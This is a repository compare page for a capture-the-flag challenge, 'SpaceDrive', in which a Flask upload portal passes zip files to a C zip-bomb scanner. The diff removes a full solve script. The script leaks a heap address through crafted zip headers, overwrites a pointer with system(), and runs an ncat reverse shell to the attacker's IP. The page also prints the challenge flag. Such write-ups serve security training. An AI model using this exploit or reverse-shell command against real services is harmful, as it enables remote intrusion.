alex/spacedrive
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Compare commits

base: alex:3de61a11fcd4661ee0a49ff653c9a54c0add49f5
Branches Tags
alex:main
..
compare: alex:56ded46af583d96019244db7e8caf58dd6c333e2
Branches Tags
alex:main

No commits in common. "3de61a11fcd4661ee0a49ff653c9a54c0add49f5" and "56ded46af583d96019244db7e8caf58dd6c333e2" have entirely different histories.
3de61a11fc ... 56ded46af5

34 changed files with 122 additions and 416 deletions
Download patch file Download diff file Expand all files Collapse all files

0
src/mineziper/CMakeLists.txt → CMakeLists.txt
View file

20
Dockerfile
View file

@ -1,20 +0,0 @@
FROM ubuntu:22.04
RUN apt update && apt install python3-pip ncat -y
RUN useradd -m -s /bin/bash user
USER user
WORKDIR /home/user
COPY dist/mineziperd .
COPY src/webapp webapp
COPY flag.txt .
WORKDIR /home/user/webapp
RUN pip install -r requirements.txt
EXPOSE 5000
ENV FLASK_APP=app.py
CMD ["python3", "-m", "flask", "run", "--host", "0.0.0.0"]

28
README.md
View file

@ -1,26 +1,4 @@
# SpaceDrive
## Deploy chall
```bash
sudo docker build -t chall .
sudo docker run --rm -p 5000:5000 -it chall
```
## :triangular_flag_on_post: Challenge Informations
| **Title** | Notebook |
| ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Category** | pwn |
| **Description** | To upload the firmware updates to our satellites, we deplopped SpaceDrive, a safe file uploader across the stars. Because we experienced many issues with malicious ZipFiles in the past, our security team also developped a zip scanner to detected embeded malware. Will you be able to break it to take control of the satellite? |
| **Author** | atxr |
| **Difficulty (/10)** | 8 |
| **Is Remote** | Yes |
| **Has attachments** | Yes |
| **Estimated solve time** | ~2h |
| **Solve instructions** | First modify the victim/attacker ip in `solve/solve.py`. Then `cd solve && python3 solve.py` and follow the instructions |
| **Flag** | **`THCon{WH3N_y0U_4N7iVIrus_IS_4C7U4LLY_4_84cKd00R}`** |
| **Deploy** | `sudo docker build -t spacedrive . && sudo docker run --rm -p 5000:5000 -it spacedrive` |
# mineziper 💣
### A Minesweeper for zip files!
Detect zip bombs based on overlapping files.

13
build.sh
View file

@ -1,13 +0,0 @@
echo "Building project and update sources in dist/"
cd src/mineziper/
mkdir build
cd build
cmake .. && make
cp bin/mineziperd ../../../dist
cd ..
rm -rf build
cd ../..
echo "Adding source backup to dist/"
zip -r dist/src.zip src

BIN
dist/mineziperd vendored
View file

Binary file not shown.

1
flag.txt
View file

@ -1 +0,0 @@
THCon{WH3N_y0U_4N7iVIrus_IS_4C7U4LLY_4_84cKd00R}

0
src/mineziper/libmineziper/CMakeLists.txt → libmineziper/CMakeLists.txt
View file

0
src/mineziper/libmineziper/include/libmineziper.h → libmineziper/include/libmineziper.h
View file

0
src/mineziper/libmineziper/include/libmineziper_bitstream.h → libmineziper/include/libmineziper_bitstream.h
View file

0
src/mineziper/libmineziper/include/libmineziper_crypto.h → libmineziper/include/libmineziper_crypto.h
View file

0
src/mineziper/libmineziper/include/libmineziper_huffman_tree.h → libmineziper/include/libmineziper_huffman_tree.h
View file

0
src/mineziper/libmineziper/include/libmineziper_zip.h → libmineziper/include/libmineziper_zip.h
View file

0
src/mineziper/libmineziper/src/libmineziper.c → libmineziper/src/libmineziper.c
View file

1
src/mineziper/libmineziper/src/libmineziper_bitstream.c → libmineziper/src/libmineziper_bitstream.c
View file

@ -1,7 +1,6 @@
#include "libmineziper_bitstream.h"
#include <assert.h>
#include <stdio.h>
unsigned int get_bits(bitstream* bs, unsigned int bit_num)
{

0
src/mineziper/libmineziper/src/libmineziper_crypto.c → libmineziper/src/libmineziper_crypto.c
View file

0
src/mineziper/libmineziper/src/libmineziper_huffman_tree.c → libmineziper/src/libmineziper_huffman_tree.c
View file

0
src/mineziper/libmineziper/src/libmineziper_zip.c → libmineziper/src/libmineziper_zip.c
View file

0
src/mineziper/mineziper/CMakeLists.txt → mineziper/CMakeLists.txt
View file

0
src/mineziper/mineziper/mineziper.c → mineziper/mineziper.c
View file

0
src/mineziper/mineziper/mineziperd.c → mineziper/mineziperd.c
View file

135
solve/solve.py
View file

@ -1,135 +0,0 @@
import requests
import struct
import zipfile
##############
# PARAMETERS #
##############
# Victim params
ip = "X.X.X.X"
port = 5000
url = f"http://{ip}:{port}/upload"
# Reverse shell params
my_ip = "X.X.X.X"
my_port = 9001
#############
# LEAK ASLR #
#############
guess = 0
leak = b""
size_chunk = 0x20
off_data = size_chunk * 2
stored_block_lfh = b'PK\x03\x04\n\x00\x00\x00\x00\x00\xd2\xbb[X\xday\xa1\xa7\x04\x00\x00\x00\x04\x00\x00\x00\x05\x00\x1c\x00dummyUT\t\x00\x03\x8cb\xdee\x8cb\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x009\t\xb4\x13'
stored_block_cd = b'PK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00\xd2\xbb[X\xday\xa1\xa7\x04\x00\x00\x00\x04\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x00\x00\x00\x00dummyUT\x05\x00\x03\x8cb\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00'
cd = b"PK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00C\x8a[X\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00%b\x18\x00%b\x00\x00\x00\x00\x00\x00\xa4\x81%blinpeas.shUT\x05\x00\x03>\x0b\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00"
eocd = b"PK\x05\x06\x00\x00\x00\x00\x80\x00%b%b%b\x00\x00"
lencd = len(cd % (b"00", b"00", b"0000"))
leneocd = len(eocd % (b"00", b'0000', b'0000'))
totsize = len(stored_block_lfh)
totsize += len(stored_block_cd)
totsize += lencd
totsize += leneocd
totsize += 8 # metadata of heap chunk
while totsize & 0xf != 0:
totsize += 1
off_data += totsize # offset to the beg of "data"
off_data -= 0x18 # ajust to the beg of data.filename
print(f"{hex(size_chunk)=}\n{hex(off_data)=}")
for _ in range(8):
off_data += 1
for guess in range(0x100):
# Add a classical stored block to put the free address on the heap
zip = stored_block_lfh
zip += stored_block_cd
# generate payload for the size and inject malicious cdh
payload = (guess << 8)
if len(leak):
payload += leak[0]
comp = (0x1000a - payload) % 0x10000
zip += cd % (struct.pack("H", payload), struct.pack("H", comp), struct.pack("I", off_data))
# Add EOCD
zip += eocd % (
struct.pack("H", 2),
struct.pack("I", lencd + len(stored_block_cd)),
struct.pack("I", len(stored_block_lfh))
)
x = requests.post(url, files={'file': zip})
if "Error" not in x.text:
print("Found correct guess:", hex(guess))
leak = guess.to_bytes(1, "big") + leak
print(leak)
leak_i = 0
for i in range(8):
leak_i += leak[7-i] << (i*8)
print(hex(leak_i))
#######################
# Craft malicious zip #
#######################
l = 96
offset = -0x54670
free = leak_i
system = struct.pack("Q", free + offset)
command = b"ncat %b %b -e /bin/bash\x00" % (my_ip.encode(), str(my_port).encode())
payload = command + b"a" * (l - len(command)) + b"\x00"*4 + system
with zipfile.ZipFile("payload.zip", "w", zipfile.ZIP_DEFLATED) as zipf:
with zipf.open("payload.txt", "w") as f:
f.write(payload)
f.close()
for i in range(1, 8):
with zipf.open(f"dummy{str(i)}.txt", "w") as f:
f.write(b"dummy")
f.close()
zipf.close()
zip = b""
with open("payload.zip", "rb") as zipf:
zip = zipf.read()
zipf.close()
off = zip.find(bytes([len(payload)]))
print("Offset of payload size: " + hex(off))
zip = zip[:off] + b"\x24" + zip[off+1:]
with open("payload.zip", "wb") as zipf:
zipf.write(zip)
zipf.close()
print("payload.zip patched")
print("You can start listening on port ", str(my_port))
print("Once you get the shell, `cat ~/flag.txt`")
input("Press any key when you are ready...")
print("Sending payload...")
x = requests.post(url, files={'file': zip})
print(x.text)

4
src/mineziper/README.md
View file

@ -1,4 +0,0 @@
# mineziper 💣
### A Minesweeper for zip files!
Detect zip bombs based on overlapping files.

7
src/webapp/requirements.txt
View file

@ -1,7 +0,0 @@
blinker==1.7.0
click==8.1.7
Flask==3.0.2
itsdangerous==2.1.2
Jinja2==3.1.3
MarkupSafe==2.1.5
Werkzeug==3.0.1

135
src/webapp/static/styles.css
View file

@ -1,135 +0,0 @@
body {
font-family: 'Roboto', sans-serif;
background-color: #0a0a23;
color: #ffffff;
margin: 0;
padding: 0;
background-image: url('space.jpg');
background-size: cover;
}
.container {
max-width: 500px;
margin: 50px auto;
padding: 20px;
background-color: #1a1a33;
border-radius: 10px;
box-shadow: 0px 0px 20px rgba(255, 255, 255, 0.1);
}
h1 {
text-align: center;
margin-bottom: 30px;
}
form {
text-align: center;
}
/* Hide the default file input button */
input[type="file"] {
display: none;
}
/* Style the custom file input button */
.custom-file-upload {
border: 2px solid #00BFFF;
border-radius: 5px;
padding: 10px 20px;
background-color: transparent;
color: #00BFFF;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s, border-color 0.3s, color 0.3s;
margin-right: 10px;
}
.custom-file-upload:hover {
background-color: #00BFFF;
/* Light blue background on hover */
color: #FFFFFF;
/* White text color on hover */
}
.custom-file-upload:focus {
outline: none;
/* Remove default focus outline */
border-color: #1E90FF;
/* Darker blue border color on focus */
}
input[type="submit"] {
border: 2px solid #00BFFF;
border-radius: 5px;
padding: 10px 20px;
background-color: #00ccff;
color: #ffffff;
cursor: pointer;
font-size: 16px;
transition: background-color 0.3s;
margin-left: 10px;
}
input[type="submit"]:hover {
background-color: #0099cc;
}
.message {
text-align: center;
margin-top: 20px;
padding: 10px;
background-color: #2d2d2d;
color: #ffffff;
border: 1px solid #ffffff;
border-radius: 5px;
}
.note {
font-size: 16px;
color: #FFFFFF;
/* White color for visibility */
margin-top: 20px;
text-align: center;
font-style: italic;
border: 2px solid #FFFFFF;
/* White border */
padding: 10px;
border-radius: 5px;
background-color: rgba(0, 0, 0, 0.5);
/* Semi-transparent black background */
box-shadow: 0px 0px 10px rgba(255, 255, 255, 0.2);
/* Add shadow for depth */
}
.success {
background-color: #c9e6c9;
color: #008000;
border: 1px solid #4caf50;
}
.error {
background-color: #f8d7da;
color: #721c24;
border: 1px solid #f5c6cb;
}
/* CSS for "go back to home page" link */
.back-link {
display: inline-block;
margin-top: 20px;
text-decoration: none;
padding: 10px 20px;
background-color: #007bff;
/* Blue background color */
color: #fff;
/* White text color */
border-radius: 5px;
transition: background-color 0.3s, color 0.3s;
}
.back-link:hover {
background-color: #0056b3;
/* Darker blue background color on hover */
color: #fff;
/* White text color on hover */
}

37
src/webapp/templates/index.html
View file

@ -1,37 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Satellite File Upload</title>
<link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
<div class="container">
<h1>SpaceDrive 🛰️</h1>
<p>Welcome to the SpaceDrive portal. This service allows you to securely upload files to our satellite
systems orbiting Earth.</p>
<p>Using this portal, you can securely transmit files to our satellites from anywhere on Earth. 🌏</p>
<p class="note">Note: Submitted files will be scanned to detect malicious patterns. Our team has developed a
specific tool to scan zip files.</p>
<form action="/upload" method="post" enctype="multipart/form-data">
<label class="custom-file-upload">
<input type="file" name="file">
Choose a file
</label>
<input type="submit" value="Upload">
</form>
<div class="message" id="message">
🚀🚀🚀
</div>
</body>
</html>

17
src/webapp/templates/upload_status.html
View file

@ -1,17 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Upload Status</title>
<link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
<div class="container">
<div class="message {% if success %}success{% else %}error{% endif %}">
{{ message }}
</div>
<a href="/" class="back-link">Go back to upload page</a>
</div>
</body>
</html>

0
src/mineziper/tests/CMakeLists.txt → tests/CMakeLists.txt
View file

0
src/mineziper/tests/test_decode_fixed_tree.c → tests/test_decode_fixed_tree.c
View file

0
src/mineziper/tests/test_decode_huffman_tree.c → tests/test_decode_huffman_tree.c
View file

0
src/mineziper/tests/test_get_cdh.c → tests/test_get_cdh.c
View file

27
src/webapp/app.py → webapp/app.py
View file

@ -3,8 +3,6 @@ import socket
from struct import pack, unpack
import hashlib
import sys
import time
import os
PORT = 8989
@ -19,28 +17,18 @@ def index():
@app.route('/upload', methods=['POST'])
def upload():
if 'file' not in request.files:
return render_template('upload_status.html', message='No file part', success=False)
return 'No file part'
file = request.files['file']
if file.filename == '':
return render_template('upload_status.html', message='No selected file', success=False)
return 'No selected file'
buf = file.read()
hash = hashlib.sha256(buf).digest()
# Scan file
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect(("localhost", PORT))
break
except:
print("Restarting mineziper service", file=sys.stdout)
os.system("pkill mineziperd")
os.system("~/mineziperd &")
time.sleep(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect(("localhost", PORT))
s.send(pack("I", len(buf)))
s.send(buf)
@ -56,19 +44,16 @@ def upload():
elif (status == 1):
message = "Error: Potential virus found, cannot upload."
success = False
else:
message = 'File successfully uploaded'
files.append({'filename': file.filename, 'content':buf})
success = True
except:
message = 'Error: Failed to scan file'
success = False
s.close()
return render_template('upload_status.html', message=message, success=success)
return message
if __name__ == '__main__':
app.run(debug=True)

0
src/webapp/static/space.jpg → webapp/static/space.jpg
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 1.7 MiB

After

Width:  |  Height:  |  Size: 1.7 MiB

Before After
Before After

78
webapp/static/styles.css Normal file
View file

@ -0,0 +1,78 @@
body {
font-family: 'Roboto', sans-serif;
background-color: #0a0a23;
color: #ffffff;
margin: 0;
padding: 0;
background-image: url('space.jpg');
background-size: cover;
}
.container {
max-width: 500px;
margin: 50px auto;
padding: 20px;
background-color: #1a1a33;
border-radius: 10px;
box-shadow: 0px 0px 20px rgba(255, 255, 255, 0.1);
}
h1 {
text-align: center;
margin-bottom: 30px;
}
form {
text-align: center;
}
input[type="file"] {
margin-bottom: 20px; /* Adjust margin-bottom to create space below the input */
margin-top: 20px; /* Add margin-top to create space above the input */
padding: 10px;
border: 2px solid #ddd;
border-radius: 5px;
width: 80%;
display: block;
margin: 0 auto;
background-color: #1a1a33;
color: #ffffff;
}
input[type="file"]::placeholder {
color: #ffffff;
}
input[type="submit"] {
background-color: #00ccff;
color: #ffffff;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
transition: background-color 0.3s;
}
input[type="submit"]:hover {
background-color: #0099cc;
}
.message {
text-align: center;
margin-top: 20px;
padding: 10px;
background-color: #2d2d2d;
color: #ffffff;
border: 1px solid #ffffff;
border-radius: 5px;
}
.note {
font-size: 14px;
color: #666;
margin-top: 10px;
text-align: center;
font-style: italic;
}

35
webapp/templates/index.html Normal file
View file

@ -0,0 +1,35 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Satellite File Upload</title>
<link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
<div class="container">
<h1>Satellite File Upload</h1>
<p>Welcome to the Satellite File Upload portal. This portal allows you to securely upload files to our satellite
systems orbiting Earth.</p>
<p>Our satellites are equipped with advanced sensors and instruments that collect various types of data,
including weather patterns, environmental changes, and astronomical observations. To ensure the smooth
operation of these satellites, it's essential to regularly upload firmware updates, configuration files, and
scientific data.</p>
<p>Using this portal, you can securely transmit files to our satellites from anywhere on Earth. Once uploaded,
our satellite communication systems will process and integrate the data seamlessly into our satellite
networks.</p>
<form action="/upload" method="post" enctype="multipart/form-data">
<input type="file" name="file" placeholder="Choose file">
<input type="submit" value="Upload">
<p class="note">Note: Submitted files will be scanned to detect malicious patterns. Our team has developed a
specific tool to scan zip files.</p>
</form>
<div class="message" id="message"></div>
</div>
</body>
</html>